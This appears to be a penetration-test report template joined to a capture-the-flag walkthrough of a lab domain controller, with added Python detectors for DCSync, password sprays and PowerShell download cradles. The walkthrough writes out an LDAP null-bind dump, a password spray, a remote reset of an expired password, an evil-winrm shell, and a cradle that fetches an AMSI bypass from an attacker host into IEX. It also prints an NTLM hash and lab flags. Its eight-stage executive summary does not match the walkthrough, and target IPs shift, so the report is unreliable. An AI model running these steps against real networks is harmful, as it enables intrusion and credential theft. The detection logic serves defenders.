Executive Summary
This report documents a simulated penetration test against a corporate network, with the end goal of compromising the forest domain controller. The engagement emulated a capable adversary who chains repeated cycles of lateral movement and privilege escalation. Every technique used is mapped to the MITRE ATT&CK framework and was chosen to exploit a specific weakness in the network.
Key findings include several high-risk weaknesses that allowed successive footholds and escalations across the infrastructure, culminating in full control of the forest domain controller. The report closes with targeted recommendations for hardening the network, improving detection coverage, and reducing the overall attack surface.
High-Level Summary
- Key Vulnerabilities: Critical issues included insecure service configurations, credential misuse, and several unpatched systems.
- Attack Path: A multi-stage chain of three lateral movements and four privilege escalations, ending with a DCSync against the forest domain controller.
- Impact: Full domain compromise, demonstrating the risk of large-scale data exposure and manipulation of every domain-joined system.
Key Findings
| Stage | Target System | Technique | CVSS Score | Impact |
|---|---|---|---|---|
| 1 | Web Server | Phishing | 7.5 | High |
| 2 | Workstation | Local Exploit | 8.0 | High |
| 3 | Departmental Server | Pass the Ticket | 7.4 | High |
| 4 | Departmental Server | Software Exploit | 8.5 | High |
| 5 | Domain Controller | Remote Desktop | 7.8 | High |
| 6 | Domain Controller | Token Forging | 8.2 | High |
| 7 | IT Admin Server | Lateral Tool Transfer | 7.5 | High |
| 8 | Forest Domain Controller | DCSync | 9.0 | Critical |
Attack Flow and Narrative
Stage 1: Initial Access
- Target System: External Corporate Web Server
- Technique: Phishing (T1566)
- Details: Opened the attack chain with a phishing email whose payload delivered and executed malware on a user's workstation.
- CVSS Score: 7.5 (High)
Stage 2: Privilege Escalation
- Target System: User’s Workstation
- Technique: Exploitation for Privilege Escalation (T1068)
- Details: Used a local exploit to gain administrative rights on the user’s workstation.
- CVSS Score: 8.0 (High)
Stage 3: First Lateral Movement
- Target System: Departmental Server
- Technique: Pass the Ticket (T1550.003)
- Details: Leveraged stolen Kerberos tickets from the compromised workstation to access the departmental server.
- CVSS Score: 7.4 (High)
Stage 4: Second Privilege Escalation
- Target System: Departmental Server
- Technique: Exploitation for Privilege Escalation (T1068)
- Details: Exploited a vulnerability in third-party software to obtain domain-level credentials.
- CVSS Score: 8.5 (High)
Stage 5: Second Lateral Movement
- Target System: Secondary Domain Controller
- Technique: Remote Services: Remote Desktop Protocol (T1021.001)
- Details: Used the domain credentials obtained in Stage 4 to log on to the secondary domain controller over RDP.
- CVSS Score: 7.8 (High)
Stage 6: Third Privilege Escalation
- Target System: Secondary Domain Controller
- Technique: Forge Web Credentials (T1606)
- Details: Forged authentication tokens to increase access privileges within the domain.
- CVSS Score: 8.2 (High)
Stage 7: Third Lateral Movement
- Target System: Main IT Administration Server
- Technique: Lateral Tool Transfer (T1570)
- Details: Transferred and executed a custom remote access tool to the main IT admin server.
- CVSS Score: 7.5 (High)
Stage 8: Final Privilege Escalation
- Target System: Forest Domain Controller
- Technique: DCSync (T1003.006)
- Details: From the IT admin server, performed a DCSync against the forest domain controller: an account holding the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights asked the DC to replicate its directory secrets, yielding the domain's password hashes and Kerberos keys without ever touching the DC's disk.
- CVSS Score: 9.0 (Critical)
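DCSync is loud if the domain head is audited: every replication request that a DC authorises produces Security event 4662 with AccessMask 0x100 and the replication-right GUIDs in the Properties field, and only DC machine accounts (and a few known products such as Azure AD Connect) should ever issue such requests. The check below is an added example, not part of the original report; it runs that logic over constructed 4662 records, and the `KNOWN_DCS` allowlist is an assumption taken from the single DC seen in the scan later in this document.

```python
"""Detection logic for the DCSync step (T1003.006) described above.

Added example, not part of the original report. DCSync asks a domain
controller to replicate directory secrets over the DRS protocol, which the
DC authorises through the control-access rights DS-Replication-Get-Changes
and DS-Replication-Get-Changes-All (plus -In-Filtered-Set). With object
auditing enabled on the domain head, each request is logged as Security
event 4662 with AccessMask 0x100 and those right GUIDs in Properties.
Legitimate replication comes from DC machine accounts (and products such as
Azure AD Connect), so the check alerts on every other principal.
The events and the DC list below are constructed sample data.
"""
from dataclasses import dataclass

# Control-access right GUIDs exactly as they appear in the 4662 Properties field.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES: "DS-Replication-Get-Changes",
    DS_REPLICATION_GET_CHANGES_ALL: "DS-Replication-Get-Changes-All",
    DS_REPLICATION_GET_CHANGES_FILTERED: "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS bit in AccessMask


@dataclass(frozen=True)
class Event4662:
    subject_domain: str   # SubjectDomainName
    subject_user: str     # SubjectUserName (machine accounts end with '$')
    access_mask: str      # AccessMask as logged, e.g. "0x100"
    properties: str       # Properties: the GUIDs the caller exercised


def replication_rights(event):
    """Names of the replication rights present in this event's Properties."""
    props = event.properties.lower()
    return sorted(name for guid, name in REPLICATION_RIGHTS.items() if guid in props)


def detect_dcsync(events, allowlist):
    """Return (principal, [rights]) for replication requests by non-allowlisted accounts.

    allowlist: SubjectUserNames permitted to replicate (DC machine accounts,
    directory-sync service accounts). Keep it short and review it; anything
    else requesting these rights is a DCSync until proven otherwise.
    """
    allowed = {a.upper() for a in allowlist}
    hits = []
    for ev in events:
        if int(ev.access_mask, 16) & CONTROL_ACCESS == 0:
            continue                      # not a control-access operation
        rights = replication_rights(ev)
        if not rights:
            continue                      # some other extended right
        if ev.subject_user.upper() in allowed:
            continue                      # expected replication partner
        hits.append((f"{ev.subject_domain}\\{ev.subject_user}", rights))
    return hits


# Constructed sample: the DC replicating normally, a user account running a
# DCSync, and an unrelated 4662 (a property read on a user object) that must
# not fire. KNOWN_DCS is an assumption: the one DC visible in the scan below.
KNOWN_DCS = ["BABYDC$"]
SAMPLE_EVENTS = [
    Event4662("BABY", "BABYDC$", "0x100",
              f"{{{DS_REPLICATION_GET_CHANGES}}} {{{DS_REPLICATION_GET_CHANGES_ALL}}}"),
    Event4662("BABY", "j.doe", "0x100",
              f"{{{DS_REPLICATION_GET_CHANGES}}} {{{DS_REPLICATION_GET_CHANGES_ALL}}}"),
    Event4662("BABY", "j.doe", "0x10", "{bf967aba-0de6-11d0-a285-00aa003049e2}"),
]

if __name__ == "__main__":
    for principal, rights in detect_dcsync(SAMPLE_EVENTS, KNOWN_DCS):
        print(f"DCSync suspected: {principal} exercised {', '.join(rights)}")
```

The allowlist is the tuning knob: new DCs and directory-sync service accounts must be added to it deliberately, otherwise they page the on-call; conversely a DC machine account appearing as SubjectUserName from a workstation IP is itself worth a rule, because DCSync tools can run as a stolen DC account.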
| Server IP Address | Hostname | Compromised | Low-Privilege User | High-Privilege User |
|---|---|---|---|---|
| 192.168.X.X | HOSTNAME | No | N/A | N/A |
| 192.168.X.X | HOSTNAME | Yes | user | root |
| 192.168.X.X | HOSTNAME | Yes | N/A | root |
Detailed Findings and Recommendations
10.10.77.248 (BabyDC.baby.vl)
Recon
rustscan -a 10.10.77.248 --ulimit 5000 -- -Pn -sC -sV -oA baby
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-04-30 20:15:48Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-04-30T20:16:41+00:00
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-04-29T20:11:46
| Not valid after: 2024-10-29T20:11:46
| MD5: 55ca:d6fe:bd22:5262:0349:0a44:f845:a4fc
| SHA-1: 8e98:831e:5131:4584:0619:ead1:d401:a0b1:fbbb:55e6
|_ssl-date: 2024-04-30T20:17:20+00:00; +7s from scanner time.
5357/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack .NET Message Framing
49664/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Resource Development
Add an /etc/hosts entry mapping 10.10.77.248 to baby.vl and BabyDC.baby.vl (names taken from the RDP NTLM info above) so that Kerberos and LDAP tooling can resolve the domain controller by name.

Scanning
LDAP anonymous enumeration using CME (CrackMapExec). A null bind is accepted, so the user list and each account's description attribute can be read without credentials; the description field is where the password turned up:
cme ldap 10.10.77.248 -u '' -p '' --users
cme ldap 10.10.77.248 -u '' -p '' -M user-desc

Once I found the password in a user's description field, I saved the enumerated user list to only_users.txt and sprayed that single password against every account:
cme smb 10.10.77.248 -u only_users.txt -p 'BabyStart123!'

Initial Access (Resetting an Expired Password Remotely)
The spray returned STATUS_PASSWORD_MUST_CHANGE for caroline.robinson: the password is correct but expired, so SMB and WinRM logons are refused until it is changed. The account is still usable, because the SAMR password-change call accepts the expired password as the old one. Impacket's smbpasswd.py performs that change remotely (it prompts for the current password, BabyStart123!):
smbpasswd.py -newpass Password123! caroline.robinson@10.10.64.245

Re-running the spray with the new password confirms that the account now authenticates:
cme smb 10.10.77.248 -u only_users.txt -p 'Password123!'
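The enumeration-and-spray sequence above has two steps worth automating on any engagement: picking credential-looking values out of description attributes, and reading the spray result so that STATUS_PASSWORD_MUST_CHANGE is treated as a hit to follow up rather than a failure. The helpers below are an added example, not part of the original report or of CrackMapExec; the description entries and the CME output lines are constructed to mimic CME's format, and only the domain, host and the leaked password come from the report.

```python
"""Triage helpers for the LDAP-description and password-spray steps above.

Added example, not part of the original report or of CrackMapExec (CME).
Two checks a tester (or a defender reviewing their own directory) wants
automated:

  1. Find user-description fields that leak credentials, which is what the
     `-M user-desc` run surfaced.
  2. Classify the result of a single-password spray so that accounts
     reporting STATUS_PASSWORD_MUST_CHANGE are kept for a remote reset
     (smbpasswd.py) instead of being discarded with the logon failures.

All sample data below is constructed; the CME lines mimic its output format.
Before spraying for real, read the lockout policy (`cme smb <ip> -u '' -p ''
--pass-pol`) and stay below the threshold per round.
"""
import re
from collections import defaultdict

# Words that, next to a value, usually mean someone stored a credential.
CREDENTIAL_HINTS = re.compile(
    r"\b(pass(word|wd)?|pwd|credential|initial|temp(orary)?|set to)\b", re.I)
# A single token with upper, lower, digit and symbol, 8+ chars: shaped like a password.
PASSWORD_SHAPE = re.compile(
    r"(?=\S*[A-Z])(?=\S*[a-z])(?=\S*\d)(?=\S*[^\w\s])\S{8,}")


def find_leaked_passwords(descriptions):
    """descriptions: {sAMAccountName: description or None} -> {user: candidate}."""
    leaks = {}
    for user, desc in descriptions.items():
        if not desc or not CREDENTIAL_HINTS.search(desc):
            continue
        m = PASSWORD_SHAPE.search(desc)
        if m:
            leaks[user] = m.group(0).rstrip(".,;")
    return leaks


# One CME smb result line: protocol, ip, port, host, [+]/[-], DOMAIN\user:secret, status.
CME_LINE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
    r"\[(?P<mark>[-+])\]\s+(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<secret>\S+)"
    r"(?:\s+(?P<status>\S+))?")


def triage_spray(cme_output):
    """Bucket each account by outcome: admin, valid, must_change, locked, failed."""
    buckets = defaultdict(list)
    for line in cme_output.splitlines():
        m = CME_LINE.match(line.strip())
        if not m:
            continue                          # banner ([*]) and other noise
        user = m["user"]
        if m["mark"] == "+":
            buckets["admin" if m["status"] == "(Pwn3d!)" else "valid"].append(user)
            continue
        status = m["status"] or "STATUS_LOGON_FAILURE"
        if status == "STATUS_PASSWORD_MUST_CHANGE":
            buckets["must_change"].append(user)   # correct password, expired: reset it
        elif status == "STATUS_ACCOUNT_LOCKED_OUT":
            buckets["locked"].append(user)        # stop spraying this account
        else:
            buckets["failed"].append(user)
    return dict(buckets)


# Constructed sample data (account names other than caroline.robinson are made up).
SAMPLE_DESCRIPTIONS = {
    "a.user": "Head of Finance",
    "b.user": "Password policy reviewed Q1 2024",
    "c.user": None,
    "onboarding.svc": "Initial password for new starters is BabyStart123!",
}
SAMPLE_SPRAY = r"""
SMB         10.10.77.248    445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         10.10.77.248    445    BABYDC           [-] baby.vl\a.user:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.10.77.248    445    BABYDC           [-] baby.vl\caroline.robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.77.248    445    BABYDC           [-] baby.vl\b.user:BabyStart123! STATUS_ACCOUNT_LOCKED_OUT 
SMB         10.10.77.248    445    BABYDC           [+] baby.vl\c.user:BabyStart123! 
"""

if __name__ == "__main__":
    print("leaked:", find_leaked_passwords(SAMPLE_DESCRIPTIONS))
    print("spray:", triage_spray(SAMPLE_SPRAY))
```

The must_change bucket is the one this report acted on: those accounts are valid credentials that plain logon tooling reports as failures, and the reset that makes them usable is also an observable change (the old password stops working for its owner), so note it in the report and hand the new password back to the client at the end of the engagement.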

Getting a shell through WinRM (evil-winrm), then staging the Sliver implant
evil-winrm -i 10.10.127.198 -u caroline.robinson -p 'Password123!'
(New-Object System.Net.WebClient).DownloadString("http://10.8.2.41/amsi64.txt") | IEX
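The one-liner above is the classic download cradle: fetch a script over HTTP and pipe it straight into the interpreter, here to disable AMSI before the shellcode runner is loaded. With PowerShell Script Block Logging enabled, the ScriptBlockText of event 4104 contains exactly this text, so it is a cheap detection. The scanner below is an added example, not part of the original report; the sample script blocks are constructed, the first being the report's own cradle, and the last a local Invoke-Expression that should not alert.

```python
"""Detection for download-and-execute cradles and AMSI tampering in
PowerShell Script Block Logging (Event ID 4104, ScriptBlockText).

Added example, not part of the original report. The key signal is a
remote fetch (WebClient.DownloadString, Invoke-WebRequest/iwr/curl) feeding
Invoke-Expression/IEX in the same block; IEX alone is common in legitimate
build scripts and is not enough. Any reference to the AMSI internals
(AmsiUtils, amsiInitFailed, AmsiScanBuffer) alerts on its own, because no
ordinary script touches them. The sample blocks are constructed.
"""
import re

CRADLE_PATTERNS = {
    # System.Net.WebClient ... .DownloadString(   (the cradle used above)
    "webclient_downloadstring": re.compile(
        r"Net\.WebClient.*?DownloadString\s*\(", re.I | re.S),
    # Invoke-WebRequest / iwr / curl piped into the interpreter
    "iwr_iex": re.compile(
        r"(Invoke-WebRequest|\biwr\b|\bcurl\b).*?\|\s*(iex|Invoke-Expression)\b", re.I | re.S),
    # Any Invoke-Expression; weak alone, strong next to a fetch
    "invoke_expression": re.compile(r"(\bIEX\b|Invoke-Expression)", re.I),
    # Reflection against AMSI internals: the bypass family amsi64.txt belongs to
    "amsi_tamper": re.compile(
        r"(AmsiUtils|amsiInitFailed|AmsiScanBuffer|amsiContext)", re.I),
}
FETCH = {"webclient_downloadstring", "iwr_iex"}
EXECUTE = {"invoke_expression", "iwr_iex"}


def score_script_block(text):
    """Return (alert, [pattern names that matched]) for one ScriptBlockText."""
    findings = sorted(name for name, rx in CRADLE_PATTERNS.items() if rx.search(text))
    hit = set(findings)
    alert = bool(hit & FETCH and hit & EXECUTE) or "amsi_tamper" in hit
    return alert, findings


def scan_script_blocks(blocks):
    """Indices and findings of the blocks that alert."""
    results = []
    for i, text in enumerate(blocks):
        alert, findings = score_script_block(text)
        if alert:
            results.append((i, findings))
    return results


# Constructed sample 4104 ScriptBlockText values. Block 0 is the cradle from
# the report; 1 and 4 are benign administration and must not alert.
SAMPLE_BLOCKS = [
    '(New-Object System.Net.WebClient).DownloadString("http://10.8.2.41/amsi64.txt") | IEX',
    'Get-ChildItem C:\\Windows\\Temp | Where-Object Length -gt 1MB',
    "$c = New-Object Net.WebClient; $s = $c.DownloadString('http://10.8.2.41/a.ps1'); Invoke-Expression $s",
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
    ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)",
    'Invoke-Expression (Get-Content .\\build.ps1 -Raw)',
]

if __name__ == "__main__":
    for idx, findings in scan_script_blocks(SAMPLE_BLOCKS):
        print(f"block {idx}: {', '.join(findings)}")
```

Two caveats for the defender: 4104 only exists if Script Block Logging is turned on by policy, and the bypass the cradle downloads is designed to stop AMSI scanning, not logging, so the log entry of the cradle itself survives even when everything that follows it is invisible to the AV engine.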
Host Recon
getprivs

Administrator NTLM hash recovered from the DC (pwdump format; the LM field is the empty-LM placeholder):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
VL{9000cab96bcf62e99073ff5f6653ce90}
*Evil-WinRM* PS C:\Users\caroline.robinson\desktop> cat user.txt
VL{b2c6150b85125d32f4b253df9540d898}
Additional Items
Appendix - AMSI Bypass code
Appendix - Powershell Shellcoderunner
Appendix - ANOTHER_SHELLCODE_USED Shellcoderunner Code
Appendix - Risk Assessment Matrix
Appendix - Proof and Local Contents
| Hostname | local.txt Contents | proof.txt Contents |
|---|---|---|
| HOSTNAME | foo | bar |
| HOSTNAME | foo | bar |
Appendix - Credentials obtained
NTLM Hashes
| Username | NTLM Hash | Found in |
|---|---|---|
| Administrator | HASH | HOSTNAME |
Passwords
| Found in | Corresponds to | Password |
|---|---|---|
| HOSTNAME | USER BELONGS | Password123* |
Credential files
| Found in | File | Type |
|---|---|---|
| HOSTNAME | FILE FROM WHERE IS IT | Example: SSH Priv. Key |